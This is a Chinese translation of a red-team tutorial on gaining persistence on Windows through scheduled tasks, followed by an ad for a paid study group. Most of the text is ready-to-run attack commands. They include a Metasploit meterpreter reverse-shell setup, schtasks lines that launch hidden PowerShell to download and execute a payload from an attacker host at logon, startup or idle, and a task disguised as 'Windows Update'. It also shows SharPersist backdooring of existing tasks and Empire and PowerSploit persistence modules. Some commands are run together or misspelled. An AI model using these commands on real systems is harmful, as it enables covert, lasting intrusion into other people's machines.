本文主要是介绍通过计划任务实现持续性攻击,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Windows操作系统中提供了一个实用工具schtasks.exe,系统管理可以使用该工具完成在指定日期和时间执行程序或脚本的工作。但是目前这个工具经常被黑客或者红队利用,从而实现持续性攻击。普通情况下,通过计划任务实现持续性攻击不需要用到管理员的权限,但是如果你希望能获得更加灵活的操作,例如指定用户登录时或者系统空闲时执行某个任务,还是会需要用到管理员的权限。
通过计划任务完成的持续性攻击既可以手动实现,也可以自动实现。Payload既可以从磁盘上执行,也可以从远程位置下载执行,这些Payload可以是可执行文件、PowerShell脚本或者scriptlets形式。
这种方法已经由来已久,但是却仍然被黑客或者红队所广泛使用,而且现在已经有很多开源工具中也都使用了这个方法。
Metasploit中的“web_delivery”模块可用于管理和生成各种格式的Payload。
use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.2.21
set target 5
exploit
在命令提示行中使用“schtasks”命令可以创建一个计划任务。
例如使用下面的命令就可以指定在每次系统登录时,操作系统会自动去下载并执行一个基于PowerShell的Payload。
schtasks /create /tn PentestLab /tr
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onlogon /ru Syste
图*-* 命令提示符中实现的计划任务
当系统用户再次登录时,系统将下载执行Payload并建立Meterpreter会话。
图*-* 通过计划任务建立的Meterperter
也可以指定Payload在系统启动期间或系统空闲时执行。
#(X64) - On System Start
schtasks /create /tn PentestLab /tr
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onstart /ru System#(X64) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onidle /i 30 #(X86) - On User Login
schtasks /create /tn PentestLab /tr
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onlogon /ru System#(X86) - On System Start
schtasks /create /tn PentestLab /tr
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onstart /ru System#(X86) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onidle /i 30
另外我们也可以指定Payload在特定的日期和时间来执行,而且也可以实现Payload的自动删除。
schtasks /CREATE /TN "Windows Update" /TR
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"/SC
minute /MO 1 /ED 04/11/2019 /ET 06:53 /Z /IT /RU %USERNAME%
图*-* 指定日期和时间开展的持续性攻击
如果一个事件(event)开启了事件日志(event logging),那么就可以通过这个事件来触发一个任务(task),b33f在他的网站上展示了这种技术。在Windows中的事件(event)命令行可以查询事件(event)的ID。
我们可以创建一个关联特定事件的计划任务(下载执行某个payload)。
图*-* 持续性攻击-计划任务事件ID
“Query”参数可用于检索新创建的计划任务的信息:schtasks /Query /tn OnLogOff /fo List /v
图*-* 查询调度任务
当目标系统的用户管理员注销时,将创建事件ID,并在下次登录时执行payload。
图*-* 用户管理员注销获取的Meterpreter
我们也可以使用PowerShell创建计划任务,这些任务将在用户登录时或在特定的时间和日期执行。
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\pentestlab.exe"
$T = New-ScheduledTaskTrigger -AtLogOn -User "pentestlab"
$S = New-ScheduledTaskSettingsSet
$P = New-ScheduledTaskPrincipal "Pentestlab"
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
Register-ScheduledTask Pentestlab -InputObjec $D$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\pentestlab.exe"
$T = New-ScheduledTaskTrigger -Daily -At 9am
$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
$S = New-ScheduledTaskSettingsSet
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
Register-ScheduledTask PentestLaboratories -InputObject $D
图*-* 持续性攻击-PowerShell
SharPersist
https://github.com/fireeye/SharPersist
Brett Hawkins通过计划任务在工具SharPersist中实现多种持续性攻击的方法。如果用户具有管理员级别的权限,就可以使用以下命令来创建一个新的计划任务,该任务将会在系统登录时执行。
SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c
C:\tmp\pentestlab.exe" -n "PentestLab" -m add -o logon
图*-* SharPersist–新计划任务(登录时触发)
在下一次登录系统时,将执行payload并打开MeterMeter会话。
SharPersist -t schtask -m list -n "PentestLab"
图*-* 使用SharPersist列出的任务信息
或者只使用“list”选项而不指定名称将枚举系统上所有现有的计划任务。
SharPersist -t schtask -m list
图*-* 使用SharPersist列出的计划任务信息
与Metasploit框架功能类似,SharPersist中也具有检查目标是否易受攻击的功能,SharPersist提供了一个运行检查,这个功能可用于通过检查名称和提供的参数来验证计划任务。
SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c
C:\tmp\pentestlab.exe" -n "PentestLab" -m check
图*-* 使用SharPersist检查任务信息能否执行
SharPersist还可以枚举登录期间将执行的所有计划任务。此命令可在主机的环境调查(situational awareness)期间使用,并确定是否可以修改现有任务而不是新建任务来执行Payload。
SharPersist -t schtaskbackdoor -m list -o logon
图*-* 使用SharPersist列出的登录时计划任务列表
schtaskbackdoor功能和check结合使用,可以识别特定的调度任务是否已存在后门。
SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c
C:\tmp\pentestlab.exe" -n "PentestLab" -m check
图*-* 使用SharPersist列出的Backdoor 计划任务列表
“Add”参数用来隐藏一个现有的计划任务,该任务将执行恶意命令,而不是执行合法的操作。
SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c
C:\tmp\pentestlab.exe" -n "ReconcileLanguageResources" -m add
图*-* 使用SharPersist列出的Backdoor 计划任务列表
Empire
Empire中包含两个可以用来实现计划任务的模块(区别在于使用时权限不同),下面给出的命令可以通过PowerShell的userland模块在每天的3:22am执行一个payload。这个payload在注册表中的的任务名称为“WindowsUpdate”,这里要和正常的任务区分开。
usemodule persistence/userland/schtasks
set Listener http
set TaskName WindowsUpdate
set DailyTime 03:22
execute
图*-* 使用Empire列出的Backdoor 计划任务列表
PowerShell的elevated模块提供了一个用户登录时执行计划任务的选项。注册表中将这两个模块以Base64编码的格式存储在不同的表项中。
usemodule persistence/elevated/schtasks*
set Listener http
图*-* elevated模块
PowerSploit
PowerSploit的持续性攻击模块支持一些可以向脚本或脚本块添加持续性攻击的功能。在使用这个模块时,需要配置Elevated和user选项。
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -Hourly
$UserOptions = New-UserPersistenceOption -ScheduledTask -Hourly
Add-Persistence -FilePath C:\temp\empire.exe -ElevatedPersistenceOption
$ElevatedOptions -UserPersistenceOption $UserOptions
图*-* PowerSploit – 计划任务列表
from:https://pentestlab.blog/tag/powersploit
想看更多国际顶级技术文章的读者可以加入我们"Kali Linux2020 渗透测试指南"知识星球,我们会提供超过20篇最新国外的技术文章的原创翻译文章和视频讲解!
当前很多培训机构和安全公众号在技术上炒冷饭,我们希望能够和大家分享国内外研究热点的论文和最新技术文章,主要是外文文献为准,目的是帮助大家更深层次的去了解到当前世界上安全领域最新的研究方向,以及国内外这些网络安全专家他们研究问题的思路和方法!
星球主讲人:
李华峰,信息安全顾问和自由撰稿人,多年来一直从事网络安全渗透测试方面的研究工作。在网络安全部署、网络攻击与防御以及社会工程学等方面有十分丰富的实践经验。已出版的著作和译著包括:《精通Metasploit渗透测试(第2版)》《诸神之眼—Nmap网络安全审计技术揭秘》《Python渗透测试编程-技术方法与实践2》《Wireshark网络分析从入门到实践》《Kali Linux 2网络渗透测试实践指南 2》等。
扫描下方二维码加入星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
扫描下方二维码加入星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
目前30000+人已关注加入我们
目前30000+人已关注加入我们
这篇关于通过计划任务实现持续性攻击的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
